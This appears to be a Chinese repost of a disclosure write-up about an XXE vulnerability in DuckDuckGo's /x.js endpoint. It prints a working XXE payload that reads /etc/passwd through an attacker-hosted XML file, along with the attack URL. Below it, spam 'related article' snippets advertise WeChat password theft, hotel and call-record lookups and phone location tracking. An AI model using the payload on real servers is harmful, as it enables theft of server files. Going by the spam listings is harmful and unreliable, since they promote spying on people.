DuckDuckGo搜索引擎的XXE漏洞_微软

访客4年前黑客文章547

近期,白帽汇安全研究院发现hackerone网站披露了DuckDuckGo搜索引擎的一个XXE漏洞。

DuckDuckGo是一个出现于2011年的互联网搜索引擎,其总部位于美国宾夕法尼亚州。和传统搜索引擎(谷歌,必应等)相比,DuckDuckGo着重保护用户的隐私,不监控、不记录用户的搜索内容,还会自动处理用户发出HTTP请求中的敏感信息(如Referer头),尽量减少第三方能获取的信息。

漏洞详情

漏洞发现者在浏览测试https://duckduckgo.com网站时,发现在路径/x.js中的参数?u存在XXE注入。

只要输入一个远程的xm l资源http://malicious_server/xxe.xml,服务器就会解析并执行,并返回一个输出。

而且网站对xm l代码没有任何控制,所以攻击者可以引入一些恶意xm l代码,对服务器进行攻击。

具体步骤如下

1.攻击者在他所控制的服务器中放上一个恶意xml文件,并对公网开放,文件内容如下。

<?xm l version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><creds> <user>&xxe;</user> <pass>mypass</pass></creds>

2.直接访问链接https://duckduckgo.com/x.js?u=http://malicious_server/xxe.xml

3.返回的页面可以看到xm l文件解析结果

标签: 好话题

相关文章

查住宿信息,如何查自己住宿记录!

查住宿信息,如何查自己住宿记录!专业盗取微信密码,开房查询,通话记录查询,查询微信聊天记录,非常靠谱!导言:整个宋代郑店的史书中没有记载,但据"东京孟华志"记载,东京扁梁市有72家正规商店,这72家大...

不要微信密码可以看到对方聊天记录吗 网上怎么查别人的微信聊天记录

不要微信密码可以看到对方聊天记录吗 网上怎么查别人的微信聊天记录 (原标题:美国两名程序员认罪:他们创办的盗版视频网站用户数已超奈飞) 澎湃新闻记者 包雨朦 实习生 纪文慧 综合报道 美...

HTTPS劫持研究_HTTPS

这篇文章描述了我们对哈萨克斯坦政府实施的电信级HTTPS劫持的分析。 哈萨克斯坦政府最近开始使用一个假的根证书颁发机构,对包括Facebook,Twitter和Google等网站在内的HTTPS连接...

微软在Bing中删除了虚假的谷歌Chrome广告_广告

微软移除必应中的虚假谷歌Chrome广告,即日,一位推特用户爆料称,微软必应搜索引擎包括歹意广告,并倾销冒充googleChrome网站。在微软删除这些广告以前,少许用户曾经看到了这些广告。 1.凭...

盒马CEO再次致歉:错了就是错了,不回避,积极承担责任_数组

"这件事本身是我们的管理强没做到位,才造成今天的结果。"今天,虎嗅F&M创新节上,盒马生鲜CEO候毅再次就"标签门"事件作出回应。"错了就是错了,盒马诚恳地向消费者道歉,不回避问题,积极承担责任。"...

破解版直接输入手机号码定位怎么做,破解版直接输入手机号码定位ios很好用

关于破解版直接输入手机号码定位,相信很多人都想知道,破解版直接输入手机号码定位ios,主要是通过了一些先进的方法来完成的,那么这些先进的方法从哪里能够得到呢。   1、各种论坛:破解版直接输入手机...